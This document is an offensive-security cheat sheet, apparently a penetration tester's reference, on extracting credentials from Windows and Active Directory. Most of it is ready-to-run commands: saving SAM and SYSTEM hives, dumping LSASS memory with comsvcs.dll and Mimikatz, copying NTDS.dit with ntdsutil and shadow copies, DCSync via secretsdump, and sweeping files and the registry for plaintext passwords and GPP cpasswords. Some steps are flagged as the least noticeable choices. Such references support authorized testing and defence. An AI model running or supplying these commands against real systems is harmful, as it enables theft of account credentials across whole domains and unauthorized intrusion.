Credential Dumping

Extracting credentials from Windows systems involves three main targets: the SAM database (local accounts), LSASS process memory (active sessions), and NTDS.dit (all domain accounts). Each requires admin or SYSTEM context.

AD Concepts Primer

Term	Description
DC	Domain Controller: runs AD DS, authenticates users, stores NTDS.dit
NTLM Hash	MD4(UTF-16LE(password)): used for authentication and offline cracking
TGT	Ticket Granting Ticket: encrypted with krbtgt hash, proves identity to the KDC
TGS	Ticket Granting Service: service ticket encrypted with the service account’s hash
SPN	Service Principal Name: attribute linking an account to a Kerberos service
NTDS.dit	AD database on every DC: contains hashes for all domain accounts
SAM	Security Account Manager: local account database, only contains local users
LSASS	Local Security Authority Subsystem Service: holds plaintext creds and hashes in memory
AS-REP	Authentication Service Response: returned by KDC in step 1 of Kerberos auth
DCC2	Domain Cached Credentials v2 (MS-CACHE2): stored locally when DC is unreachable

SAM Database

The SAM database stores local account hashes. Requires SYSTEM context: save both SAM and SYSTEM hives since the SYSTEM hive contains the boot key needed to decrypt SAM.

# Save hives (requires admin → SYSTEM via token impersonation)
reg save HKLM\SAM C:\Temp\sam.bak
reg save HKLM\SYSTEM C:\Temp\system.bak
reg save HKLM\SECURITY C:\Temp\security.bak

# Offline dump on Linux
secretsdump.py -sam sam.bak -system system.bak LOCAL

# Remote: directly against target
secretsdump.py $DOMAIN/$USER:$PASSWORD@$IP
secretsdump.py $DOMAIN/$USER@$IP -hashes :$HASH

# nxc: dumps SAM remotely
nxc smb $IP -u $USER -p $PASSWORD --sam
nxc smb $IP -u $USER -H $HASH --sam

LSASS Dump

LSASS caches credentials for active sessions: NTLM hashes, Kerberos tickets, and sometimes plaintext passwords (Wdigest). Requires SYSTEM or SeDebugPrivilege.

# Task Manager (GUI): least suspicious
# Task Manager → Details tab → right-click lsass.exe → Create dump file
# File lands in C:\Users\<user>\AppData\Local\Temp\lsass.DMP

# comsvcs.dll: pure LOLBin, no additional tooling
$pid = (Get-Process lsass).Id
rundll32 C:\Windows\System32\comsvcs.dll MiniDump $pid C:\Windows\Temp\lsass.dmp full

# Mimikatz: interactive dump on target
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::tickets /export

# Parse dump offline on Linux
pypykatz lsa minidump lsass.dmp
pypykatz lsa minidump lsass.dmp -o output.json

NTDS.dit

The domain database containing hashes for every domain account. Only on DCs: requires DC admin rights or DS-Replication privileges.

# ntdsutil IFM: official Windows tool, quiet
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\IFM" quit quit

# VSS shadow copy: bypasses file locks
vssadmin create shadow /for=C:
# Note the shadow copy device path (e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
vssadmin delete shadows /shadow=<ShadowID> /quiet

# Parse offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -just-dc-user administrator

# DCSync: simulates replication, doesn't touch NTDS.dit file
secretsdump.py $DOMAIN/$USER:$PASSWORD@$DC_IP
secretsdump.py $DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc-user krbtgt
secretsdump.py $DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc          # all hashes

# nxc
nxc smb $DC_IP -u $USER -p $PASSWORD --ntds

Credential Hunting in Files

Credentials left in config files, scripts, and the registry are common on real engagements: worth sweeping before reaching for heavier tooling.

# Broad sweep for "password" keyword
findstr /si password *.txt *.xml *.ini *.config *.ps1 *.bat

# Unattend.xml: sysprep leftover, often contains plaintext admin password
Get-ChildItem -Path C:\ -Include Unattend.xml,sysprep.xml,sysprep.inf -Recurse -ErrorAction SilentlyContinue

# Common Unattend locations
# C:\Windows\Panther\Unattend.xml
# C:\Windows\Panther\Unattend\Unattend.xml
# C:\Windows\sysprep\sysprep.xml

# web.config: IIS app credentials
Get-ChildItem -Path C:\inetpub -Include web.config -Recurse -ErrorAction SilentlyContinue | Select-String password

# GPP cPassword: Group Policy Preferences (SYSVOL, pre-MS14-025)
Get-ChildItem -Path "\\$DC_HOST\SYSVOL" -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml -ErrorAction SilentlyContinue |
  Select-String "cpassword"

# Decrypt GPP cPassword on Linux (AES key is publicly known)
gpp-decrypt <cpassword_value>

# Registry autologon: plaintext credentials stored for automatic login
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultPassword, DefaultUsername, DefaultDomainName

# PowerShell command history
Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Windows Credential Manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"

Hashcat Quick Reference

Hash Type	Hashcat Mode
NTLM	1000
DCC2 / MS-CACHE2	2100
NetNTLMv1	5500
NetNTLMv2	5600
Kerberoast RC4 (etype 23)	13100
Kerberoast AES256 (etype 18)	19700
AS-REP Roast	18200
JWT	16500

​AD Concepts Primer

​SAM Database

​LSASS Dump

​NTDS.dit

​Credential Hunting in Files

​Hashcat Quick Reference